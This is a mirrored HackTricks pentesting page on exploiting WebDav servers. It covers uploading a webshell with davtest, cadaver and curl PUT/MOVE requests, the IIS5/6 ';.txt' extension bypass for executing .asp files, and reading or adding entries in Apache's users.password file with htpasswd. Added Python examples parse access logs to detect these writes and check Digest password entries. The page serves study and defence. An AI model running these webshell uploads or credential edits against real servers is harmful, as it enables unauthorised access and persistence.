mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 13:56:22 +00:00
# WebDav
When dealing with an **HTTP server with WebDav** enabled, it is easy to **manipulate files** if you have the **right credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves **uploading and executing a webshell**.

Access to the WebDav server usually requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common way to obtain them.

To overcome restrictions on file uploads, especially those that prevent the execution of server-side scripts, you can:

* **Upload** files with **executable extensions** directly if they are not blocked.
* **Rename** uploaded non-executable files (like .txt) to an executable extension.
* **Copy** uploaded non-executable files, changing their extension to an executable one.

## DavTest

**Davtest** tries to **upload several files with different extensions** and **checks** whether the extension is **executed**:

```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Upload .txt files and try to move them to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
```

Output sample:

![](<../../.gitbook/assets/image (851).png>)

This does not mean that the **.txt** and **.html** extensions are **executed**. It means you can **access these files** via the web.

## Cadaver

You can use this tool to **connect to the WebDav server** and perform actions (like **upload**, **move** or **delete**) **manually**.

```bash
cadaver <IP>
```

## PUT request

```bash
curl -T 'shell.txt' 'http://$ip'
```

## MOVE request

```bash
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```

## IIS5/6 WebDav vulnerability

This vulnerability is very interesting. **WebDav** **does not allow** **uploading** or **renaming** files with the **.asp** extension. But you can **bypass** this by **appending** **";.txt"** to the end of the name, and the file will be **executed** as if it were an .asp file (you can also **use ".html" instead of ".txt"**, but **DON'T FORGET the ";"**).

Then you can **upload** your shell as a ".**txt"** file and **copy/move** it to a ".asp;.txt" file. When you access that file through the web server, it will be **executed** (cadaver will say the move action failed, but it did work).

![](<../../.gitbook/assets/image (1092).png>)
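
The write methods and the ";" extension trick above leave traces in the web server's access log. The following added example (not from the page) scans constructed Apache/IIS-style log lines for accepted WebDav write requests and for paths that put ";" right after a server-side script extension; the hosts, user names and timestamps are made up.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (combined log format); hosts, users and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2024:13:56:22 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 512 "-" "cadaver/0.23"
10.0.0.5 - dave [11/Dec/2024:13:56:30 +0000] "PUT /webdav/shell.txt HTTP/1.1" 201 0 "-" "curl/8.4"
10.0.0.5 - dave [11/Dec/2024:13:56:35 +0000] "MOVE /webdav/shell.txt HTTP/1.1" 201 0 "-" "curl/8.4"
10.0.0.5 - dave [11/Dec/2024:13:56:40 +0000] "PUT /webdav/shell.asp;.txt HTTP/1.1" 201 0 "-" "curl/8.4"
10.0.0.7 - - [11/Dec/2024:13:57:01 +0000] "GET /webdav/shell.asp;.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2024:13:58:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# WebDAV methods that create, rename, copy or delete server-side content.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# A server-side script extension immediately followed by ';' is the IIS 5/6 pattern described above.
SEMICOLON_EXT_RE = re.compile(r"\.(asp|aspx|php)(?=;)", re.IGNORECASE)

def analyze(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request. The MOVE/COPY target travels in the
    Destination header, which the access log does not record, so a renamed file only
    shows up here when it is requested afterwards (the GET of shell.asp;.txt above)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        method, path, status = m["method"], m["path"], int(m["status"])
        reasons = []
        if method in WRITE_METHODS and 200 <= status < 300:
            reasons.append("webdav-write-accepted")
        if SEMICOLON_EXT_RE.search(path):
            reasons.append("semicolon-extension")
        if reasons:
            findings.append({"ip": m["ip"], "user": m["user"], "method": method,
                             "path": path, "reasons": ",".join(reasons)})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```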
## Post credentials

If the WebDav was running on an Apache server you should look at the sites configured in Apache. Usually:\
_**/etc/apache2/sites-enabled/000-default**_

Inside it you can find something like:

```apache
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
    AuthType Digest
    AuthName "webdav"
    AuthUserFile /etc/apache2/users.password
    Require valid-user
</Directory>
```

As you can see, there is a file with valid **credentials** for the **webdav** server:

```
/etc/apache2/users.password
```

Inside this kind of file you will find the **username** and a **hash** of the password. These are the credentials the webdav server uses to authenticate users.

You can try to **crack** them, or **add more** if for some reason you want to **access** the **webdav** server:

```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```

To check whether the new credentials work you can do:

```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```
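
The config above uses `AuthType Digest`, whose user file stores `user:realm:MD5(user:realm:password)` with the realm taken from `AuthName` (such lines are written by `htdigest`; `htpasswd` writes two-field Basic-auth entries that Digest authentication cannot use). This added example, not from the page, recomputes the server's check in Python so you can confirm an entry before relying on it; the users, realm and passwords are constructed.

```python
import hashlib
import hmac
from typing import Optional

def digest_entry(user: str, realm: str, password: str) -> str:
    """Return the line htdigest writes: user:realm:MD5(user:realm:password) (RFC 2617 HA1)."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    return f"{user}:{realm}:{ha1}"

def entry_kind(line: str) -> str:
    """'digest' for user:realm:hash lines, 'basic' for the user:hash lines htpasswd writes."""
    fields = line.strip().split(":")
    return {2: "basic", 3: "digest"}.get(len(fields), "unknown")

def verify_digest_user(users_file: str, realm: str, user: str, password: str) -> Optional[bool]:
    """Redo the server-side check. None means no Digest entry exists for user/realm,
    e.g. because the line was added with htpasswd and AuthType Digest ignores it."""
    expected = digest_entry(user, realm, password).split(":")[2]
    for line in users_file.splitlines():
        if entry_kind(line) != "digest":
            continue
        u, r, ha1 = line.strip().split(":")
        if u == user and r == realm:
            # Constant-time comparison, as a real verifier should use.
            return hmac.compare_digest(ha1, expected)
    return None

# Constructed sample AuthUserFile (not from the page): one htdigest line for realm "webdav"
# with password "s3cret", and one htpasswd-style Basic line that Digest auth will skip.
SAMPLE_USERS_FILE = digest_entry("dave", "webdav", "s3cret") + "\n" + "bob:$apr1$placeholderhash\n"

if __name__ == "__main__":
    print(verify_digest_user(SAMPLE_USERS_FILE, "webdav", "dave", "s3cret"))   # True
    print(verify_digest_user(SAMPLE_USERS_FILE, "webdav", "bob", "anything"))  # None
```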

## References

* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
